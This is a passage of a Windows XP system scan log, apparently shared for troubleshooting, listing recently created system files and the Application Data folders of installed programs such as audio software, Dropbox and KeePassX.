[2010/02/13 09:47:36 | 000,069,612 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmplayer.adm
[2010/02/13 09:47:36 | 000,066,725 | ---- | C] () -- C:\WINDOWS\System32\dllcache\revert.wmz
[2010/02/13 09:47:36 | 000,029,070 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmp.inf
[2010/02/13 09:47:36 | 000,023,829 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tourbg.gif
[2010/02/13 09:47:36 | 000,023,195 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmplay.chm
[2010/02/13 09:47:36 | 000,017,489 | ---- | C] () -- C:\WINDOWS\System32\dllcache\videobg.gif
[2010/02/13 09:47:36 | 000,017,272 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmdm.inf
[2010/02/13 09:47:36 | 000,008,677 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm7.gif
[2010/02/13 09:47:36 | 000,007,892 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm9.gif
[2010/02/13 09:47:36 | 000,007,636 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm2.gif
[2010/02/13 09:47:36 | 000,007,369 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm4.gif
[2010/02/13 09:47:36 | 000,006,769 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmfsdk.inf
[2010/02/13 09:47:36 | 000,006,241 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm3.gif
[2010/02/13 09:47:36 | 000,006,060 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm6.gif
[2010/02/13 09:47:36 | 000,005,789 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm1.gif
[2010/02/13 09:47:36 | 000,005,290 | ---- | C] () -- C:\WINDOWS\System32\dllcache\vidsamp.gif
[2010/02/13 09:47:36 | 000,004,193 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm8.gif
[2010/02/13 09:47:36 | 000,003,187 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tour.js
[2010/02/13 09:47:36 | 000,002,477 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm5.gif
[2010/02/13 09:47:36 | 000,002,469 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tplay.gif
[2010/02/13 09:47:36 | 000,002,450 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tpause.gif
[2010/02/13 09:47:36 | 000,002,375 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tplayh.gif
[2010/02/13 09:47:36 | 000,002,371 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tpauseh.gif
[2010/02/13 09:47:36 | 000,001,398 | ---- | C] () -- C:\WINDOWS\System32\dllcache\taon.gif
[2010/02/13 09:47:36 | 000,001,380 | ---- | C] () -- C:\WINDOWS\System32\dllcache\taonh.gif
[2010/02/13 09:47:36 | 000,001,380 | ---- | C] () -- C:\WINDOWS\System32\dllcache\taoff.gif
[2010/02/13 09:47:36 | 000,001,367 | ---- | C] () -- C:\WINDOWS\System32\dllcache\taoffh.gif
[2010/02/13 09:47:36 | 000,001,148 | ---- | C] () -- C:\WINDOWS\System32\dllcache\snd.htm
[2010/02/13 09:47:36 | 000,000,908 | ---- | C] () -- C:\WINDOWS\System32\dllcache\skins.inf
[2010/02/13 09:47:35 | 000,457,607 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mdlib.wmv
[2010/02/13 09:47:35 | 000,381,425 | ---- | C] () -- C:\WINDOWS\System32\dllcache\copycd.wmv
[2010/02/13 09:47:35 | 000,375,519 | ---- | C] () -- C:\WINDOWS\System32\dllcache\nuskin.wmv
[2010/02/13 09:47:35 | 000,184,959 | ---- | C] () -- C:\WINDOWS\System32\dllcache\compact.wmz
[2010/02/13 09:47:35 | 000,097,117 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mplayer2.hlp
[2010/02/13 09:47:35 | 000,077,307 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plyr_err.chm
[2010/02/13 09:47:35 | 000,022,060 | ---- | C] () -- C:\WINDOWS\System32\dllcache\npds.zip
[2010/02/13 09:47:35 | 000,018,286 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mplayer2.inf
[2010/02/13 09:47:35 | 000,009,585 | ---- | C] () -- C:\WINDOWS\System32\dllcache\controls.css
[2010/02/13 09:47:35 | 000,008,298 | ---- | C] () -- C:\WINDOWS\System32\dllcache\contents.htm
[2010/02/13 09:47:35 | 000,006,878 | ---- | C] () -- C:\WINDOWS\System32\dllcache\controls.js
[2010/02/13 09:47:35 | 000,005,971 | ---- | C] () -- C:\WINDOWS\System32\dllcache\events.js
[2010/02/13 09:47:35 | 000,002,778 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mplogoh.gif
[2010/02/13 09:47:35 | 000,002,545 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mplogo.gif
[2010/02/13 09:47:35 | 000,001,885 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mplayer2.cnt
[2010/02/13 09:47:35 | 000,001,477 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst6.wpl
[2010/02/13 09:47:35 | 000,001,477 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst5.wpl
[2010/02/13 09:47:35 | 000,001,474 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst3.wpl
[2010/02/13 09:47:35 | 000,001,451 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst12.wpl
[2010/02/13 09:47:35 | 000,001,448 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst4.wpl
[2010/02/13 09:47:35 | 000,001,250 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst1.wpl
[2010/02/13 09:47:35 | 000,001,049 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst2.wpl
[2010/02/13 09:47:35 | 000,001,046 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst7.wpl
[2010/02/13 09:47:35 | 000,001,036 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst8.wpl
[2010/02/13 09:47:35 | 000,000,789 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst11.wpl
[2010/02/13 09:47:35 | 000,000,787 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst10.wpl
[2010/02/13 09:47:35 | 000,000,784 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst9.wpl
[2010/02/13 09:47:35 | 000,000,783 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst13.wpl
[2010/02/13 09:47:35 | 000,000,775 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst14.wpl
[2010/02/13 09:47:35 | 000,000,773 | ---- | C] () -- C:\WINDOWS\System32\dllcache\cnth.gif
[2010/02/13 09:47:35 | 000,000,772 | ---- | C] () -- C:\WINDOWS\System32\dllcache\cntd.gif
[2010/02/13 09:47:35 | 000,000,733 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst15.wpl
[2010/02/13 09:47:35 | 000,000,403 | ---- | C] () -- C:\WINDOWS\System32\dllcache\npdrmv2.zip
[2010/02/13 09:47:34 | 000,000,999 | ---- | C] () -- C:\WINDOWS\System32\dllcache\bktrh.gif
[2010/02/13 09:47:34 | 000,000,773 | ---- | C] () -- C:\WINDOWS\System32\dllcache\cnt.gif
[2010/02/13 09:47:34 | 000,000,760 | ---- | C] () -- C:\WINDOWS\System32\dllcache\cloapph.gif
[2010/02/13 09:47:34 | 000,000,717 | ---- | C] () -- C:\WINDOWS\System32\dllcache\cloapp.gif
[2010/02/13 09:45:06 | 000,064,352 | ---- | C] () -- C:\WINDOWS\System32\drivers\ativmc20.cod
[2010/02/13 09:45:05 | 000,129,045 | ---- | C] () -- C:\WINDOWS\System32\drivers\cxthsfs2.cty
[2010/02/13 09:45:05 | 000,067,866 | ---- | C] () -- C:\WINDOWS\System32\drivers\netwlan5.img
[2010/02/12 23:22:01 | 000,009,046 | ---- | C] () -- C:\WINDOWS\System32\nvinfo.pb
[2010/02/12 23:18:02 | 000,000,000 | ---- | C] () -- C:\WINDOWS\nsreg.dat
[2010/02/12 23:16:43 | 000,940,794 | ---- | C] () -- C:\WINDOWS\System32\LoopyMusic.wav
[2010/02/12 23:16:43 | 000,146,650 | ---- | C] () -- C:\WINDOWS\System32\BuzzingBee.wav
[2010/02/12 22:41:17 | 000,049,152 | ---- | C] () -- C:\WINDOWS\System32\ChCfg.exe
[2010/02/12 22:30:24 | 000,012,540 | ---- | C] () -- C:\WINDOWS\System32\wpa.bak
[2010/02/12 22:15:59 | 000,073,728 | ---- | C] () -- C:\WINDOWS\System32\RtNicProp32.dll
[2010/02/12 22:12:01 | 000,207,400 | R--- | C] () -- C:\WINDOWS\GSetup.exe
[2010/02/12 22:12:01 | 000,000,010 | ---- | C] () -- C:\WINDOWS\GSetup.ini
[2010/02/12 22:08:21 | 000,001,024 | -H-- | C] () -- C:\Documents and Settings\Me\ntuser.dat.LOG
[2010/02/12 22:08:21 | 000,000,178 | -HS- | C] () -- C:\Documents and Settings\Me\ntuser.ini
[2010/02/12 22:08:20 | 009,175,040 | -H-- | C] () -- C:\Documents and Settings\Me\NTUSER.DAT
[2010/02/12 22:07:32 | 000,008,192 | ---- | C] () -- C:\WINDOWS\REGLOCS.OLD
[2010/02/12 22:06:27 | 000,002,048 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2010/02/12 22:06:18 | 000,028,288 | ---- | C] () -- C:\WINDOWS\System32\dllcache\xjis.nls
[2010/02/12 22:05:51 | 000,083,748 | ---- | C] () -- C:\WINDOWS\System32\dllcache\prcp.nls
[2010/02/12 22:05:51 | 000,083,748 | ---- | C] () -- C:\WINDOWS\System32\dllcache\prc.nls
[2010/02/12 22:05:48 | 000,175,104 | ---- | C] () -- C:\WINDOWS\System32\dllcache\pintlcsa.dll
[2010/02/12 22:05:34 | 000,047,066 | ---- | C] () -- C:\WINDOWS\System32\dllcache\ksc.nls
[2010/02/12 22:05:33 | 001,158,818 | ---- | C] () -- C:\WINDOWS\System32\dllcache\korwbrkr.lex
[2010/02/12 22:05:26 | 000,059,392 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imscinst.exe
[2010/02/12 22:05:25 | 000,196,665 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imjpinst.exe
[2010/02/12 22:05:22 | 000,134,339 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imekr.lex
[2010/02/12 22:05:08 | 013,463,552 | ---- | C] () -- C:\WINDOWS\System32\dllcache\hwxjpn.dll
[2010/02/12 22:05:01 | 000,108,827 | ---- | C] () -- C:\WINDOWS\System32\dllcache\hanja.lex
[2010/02/12 22:04:46 | 000,173,568 | ---- | C] () -- C:\WINDOWS\System32\dllcache\chtskf.dll
[2010/02/12 22:04:42 | 000,066,594 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_864.nls
[2010/02/12 22:04:42 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_870.nls
[2010/02/12 22:04:41 | 000,180,770 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20932.nls
[2010/02/12 22:04:41 | 000,177,698 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20949.nls
[2010/02/12 22:04:41 | 000,173,602 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20936.nls
[2010/02/12 22:04:41 | 000,066,594 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_862.nls
[2010/02/12 22:04:41 | 000,066,594 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_858.nls
[2010/02/12 22:04:41 | 000,066,594 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_720.nls
[2010/02/12 22:04:41 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_708.nls
[2010/02/12 22:04:41 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_28596.nls
[2010/02/12 22:04:41 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_21027.nls
[2010/02/12 22:04:41 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_21025.nls
[2010/02/12 22:04:41 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20924.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20880.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20871.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20838.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20833.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20424.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20423.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20420.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20297.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20290.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20285.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20284.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20280.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20278.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20277.nls
[2010/02/12 22:04:39 | 000,187,938 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20005.nls
[2010/02/12 22:04:39 | 000,186,402 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20001.nls
[2010/02/12 22:04:39 | 000,185,378 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20003.nls
[2010/02/12 22:04:39 | 000,180,258 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20004.nls
[2010/02/12 22:04:39 | 000,173,602 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20002.nls
[2010/02/12 22:04:39 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20273.nls
[2010/02/12 22:04:39 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20269.nls
[2010/02/12 22:04:39 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20108.nls
[2010/02/12 22:04:39 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20107.nls
[2010/02/12 22:04:39 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20106.nls
[2010/02/12 22:04:39 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20105.nls
[2010/02/12 22:04:38 | 000,189,986 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1361.nls
[2010/02/12 22:04:38 | 000,180,258 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20000.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1149.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1148.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1147.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1146.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1145.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1144.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1143.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1142.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1141.nls
[2010/02/12 22:04:37 | 000,195,618 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_10002.nls
[2010/02/12 22:04:37 | 000,177,698 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_10003.nls
[2010/02/12 22:04:37 | 000,173,602 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_10008.nls
[2010/02/12 22:04:37 | 000,162,850 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_10001.nls
[2010/02/12 22:04:37 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1140.nls
[2010/02/12 22:04:37 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1047.nls
[2010/02/12 22:04:37 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_10021.nls
[2010/02/12 22:04:37 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_10005.nls
[2010/02/12 22:04:37 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_10004.nls
[2010/02/12 22:04:36 | 000,082,172 | ---- | C] () -- C:\WINDOWS\System32\dllcache\bopomofo.nls
[2010/02/12 22:04:35 | 000,066,728 | ---- | C] () -- C:\WINDOWS\System32\dllcache\big5.nls
[2010/02/12 22:03:36 | 000,002,626 | ---- | C] () -- C:\WINDOWS\System32\CONFIG.NT
[2010/02/12 22:03:36 | 000,000,000 | RHS- | C] () -- C:\MSDOS.SYS
[2010/02/12 22:03:36 | 000,000,000 | RHS- | C] () -- C:\IO.SYS
[2010/02/12 22:03:36 | 000,000,000 | ---- | C] () -- C:\CONFIG.SYS
[2010/02/12 22:03:36 | 000,000,000 | ---- | C] () -- C:\AUTOEXEC.BAT
[2010/02/12 22:03:33 | 000,023,392 | ---- | C] () -- C:\WINDOWS\System32\nscompat.tlb
[2010/02/12 22:03:33 | 000,016,832 | ---- | C] () -- C:\WINDOWS\System32\amcompat.tlb
[2010/02/12 22:03:32 | 000,316,640 | ---- | C] () -- C:\WINDOWS\WMSysPr9.prx
[2010/02/12 22:02:39 | 000,000,488 | ---- | C] () -- C:\WINDOWS\System32\WindowsLogon.manifest
[2010/02/12 22:02:39 | 000,000,488 | ---- | C] () -- C:\WINDOWS\System32\logonui.exe.manifest
[2010/02/12 22:02:35 | 000,000,749 | RH-- | C] () -- C:\WINDOWS\WindowsShell.Manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | C] () -- C:\WINDOWS\System32\wuaucpl.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | C] () -- C:\WINDOWS\System32\sapi.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | C] () -- C:\WINDOWS\System32\nwc.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | C] () -- C:\WINDOWS\System32\ncpa.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | C] () -- C:\WINDOWS\System32\cdplayer.exe.manifest
[2010/02/12 22:02:17 | 004,399,505 | ---- | C] () -- C:\WINDOWS\System32\dllcache\nls302en.lex
[2010/02/12 22:01:26 | 000,048,680 | -HS- | C] () -- C:\WINDOWS\winnt256.bmp
[2010/02/12 22:01:26 | 000,048,680 | -HS- | C] () -- C:\WINDOWS\winnt.bmp
[2010/02/12 22:01:15 | 000,000,984 | ---- | C] () -- C:\WINDOWS\System32\dllcache\srframe.mmf
[2010/02/12 21:59:39 | 000,021,640 | ---- | C] () -- C:\WINDOWS\System32\emptyregdb.dat
[2010/02/12 21:58:42 | 000,065,832 | ---- | C] () -- C:\WINDOWS\Santa Fe Stucco.bmp
[2010/02/12 21:58:42 | 000,026,680 | ---- | C] () -- C:\WINDOWS\River Sumida.bmp
[2010/02/12 21:58:42 | 000,017,362 | ---- | C] () -- C:\WINDOWS\Rhododendron.bmp
[2010/02/12 21:58:42 | 000,009,522 | ---- | C] () -- C:\WINDOWS\Zapotec.bmp
[2010/02/12 21:58:41 | 000,065,978 | ---- | C] () -- C:\WINDOWS\Soap Bubbles.bmp
[2010/02/12 21:58:41 | 000,065,954 | ---- | C] () -- C:\WINDOWS\Prairie Wind.bmp
[2010/02/12 21:58:41 | 000,026,582 | ---- | C] () -- C:\WINDOWS\Greenstone.bmp
[2010/02/12 21:58:41 | 000,017,336 | ---- | C] () -- C:\WINDOWS\Gone Fishing.bmp
[2010/02/12 21:58:41 | 000,017,062 | ---- | C] () -- C:\WINDOWS\Coffee Bean.bmp
[2010/02/12 21:58:41 | 000,016,730 | ---- | C] () -- C:\WINDOWS\FeatherTexture.bmp
[2010/02/12 21:58:40 | 000,093,702 | ---- | C] () -- C:\WINDOWS\System32\subrange.uce
[2010/02/12 21:58:40 | 000,016,740 | ---- | C] () -- C:\WINDOWS\System32\shiftjis.uce
[2010/02/12 21:58:40 | 000,001,272 | ---- | C] () -- C:\WINDOWS\Blue Lace 16.bmp
[2010/02/12 21:58:39 | 000,060,458 | ---- | C] () -- C:\WINDOWS\System32\ideograf.uce
[2010/02/12 21:58:39 | 000,024,006 | ---- | C] () -- C:\WINDOWS\System32\gb2312.uce
[2010/02/12 21:58:39 | 000,012,876 | ---- | C] () -- C:\WINDOWS\System32\korean.uce
[2010/02/12 21:58:39 | 000,008,484 | ---- | C] () -- C:\WINDOWS\System32\kanji_2.uce
[2010/02/12 21:58:39 | 000,006,948 | ---- | C] () -- C:\WINDOWS\System32\kanji_1.uce
[2010/02/12 21:58:38 | 000,022,984 | ---- | C] () -- C:\WINDOWS\System32\bopomofo.uce
[2010/02/12 21:58:35 | 000,003,286 | ---- | C] () -- C:\WINDOWS\System32\tslabels.h
[2010/02/12 21:58:35 | 000,001,161 | ---- | C] () -- C:\WINDOWS\System32\usrlogon.cmd
[2010/02/12 21:58:33 | 000,000,768 | ---- | C] () -- C:\WINDOWS\System32\msdtcprf.h
[2010/02/12 21:58:22 | 000,063,488 | ---- | C] () -- C:\WINDOWS\System32\wmimgmt.msc
[2009/11/06 10:58:04 | 000,178,975 | ---- | C] () -- C:\WINDOWS\System32\xlive.dll.cat
[2009/10/20 14:19:30 | 000,053,299 | ---- | C] () -- C:\WINDOWS\System32\pthreadVC.dll
[2009/07/30 21:58:42 | 000,000,314 | ---- | C] () -- C:\WINDOWS\primopdf.ini
[2009/05/27 05:48:08 | 000,094,208 | ---- | C] () -- C:\WINDOWS\System32\zmbv.dll

[color=#E56717]========== LOP Check ==========[/color]

[2010/03/19 19:31:43 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Alwil Software
[2010/04/11 21:04:13 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Avid
[2010/02/23 00:27:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Cakewalk
[2010/02/13 00:41:32 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\CanonBJ
[2010/02/14 01:12:36 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\DAEMON Tools Lite
[2010/05/06 20:35:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\DonationCoder
[2010/04/15 22:24:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\IObit
[2010/04/08 17:52:48 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\MAGIX
[2010/02/23 00:49:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Native Instruments
[2010/04/12 00:19:32 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\PACE Anti-Piracy
[2010/04/11 21:33:07 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Pinnacle
[2010/04/12 00:19:34 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Pinnacle Studio Ultimate
[2010/02/16 00:13:43 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Syncrosoft
[2010/04/24 17:00:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\TEMP
[2010/02/26 16:29:29 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Virtualized Applications
[2010/02/24 18:38:22 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\VirtualizedApplications
[2010/04/19 22:27:53 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\YSFLIGHT.COM
[2010/02/23 00:49:48 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{0CC51CB2-911C-40BB-BC1B-BD3CAC590222}
[2010/02/23 00:49:31 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{4F32CAF7-963B-404D-BF13-C48BA3F5F6A7}
[2010/02/23 00:31:04 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{902029B2-957E-4066-85FA-30DA31731718}
[2010/05/06 20:37:06 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{A87EB928-0C6C-4071-AEF1-59E32BAEDF1B}
[2010/02/23 00:49:17 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{AC46DC4F-66BD-4733-A8B4-0B69418C12D0}
[2010/02/23 00:50:35 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{D69A48BF-7653-4AA8-94BC-5847522A4573}
[2010/02/23 00:48:52 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{EC98E512-708C-4C3B-9F07-B58768C1DD8A}
[2010/05/13 20:42:57 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\.purple
[2010/02/14 00:14:45 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Amazon
[2010/02/21 18:46:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Audacity
[2010/04/11 21:04:13 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Avid
[2010/02/23 00:34:23 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Cakewalk
[2010/02/13 21:00:53 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\DAEMON Tools Lite
[2010/05/06 20:36:03 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\DonationCoder
[2010/05/13 16:59:31 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Dropbox
[2010/04/20 20:18:33 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\flightgear.org
[2010/03/06 19:39:11 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Foxit
[2010/04/01 09:34:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Foxit Software
[2010/04/17 21:40:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\GetRightToGo
[2010/02/27 03:24:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\GrabIt
[2010/03/08 14:59:46 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\gtk-2.0
[2010/03/04 22:17:05 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\HandBrake
[2010/04/12 07:55:05 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\ImgBurn
[2010/04/07 20:38:38 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\IObit
[2010/02/18 20:19:44 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\KeePassX
[2010/02/21 19:38:07 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Leadertech
[2010/04/08 17:54:07 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\MAGIX
[2010/04/25 14:52:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mobipocket
[2010/02/15 16:16:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\NewsLeecher
[2010/03/29 19:57:18 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Notepad++
[2010/02/14 23:10:41 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\NVD
[2010/02/15 17:13:12 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\OpenOffice.org
[2010/04/12 00:19:32 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\PACE Anti-Piracy
[2010/02/16 21:27:34 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\PreSonus
[2010/05/12 15:45:05 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\PrimoPDF
[2010/03/15 19:44:59 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\SanDisk
[2010/02/21 15:32:34 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\ScummVM
[2010/02/26 19:05:46 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\SoftGrid Client
[2010/05/06 20:37:09 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Stardock
[2010/02/16 21:00:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Steinberg
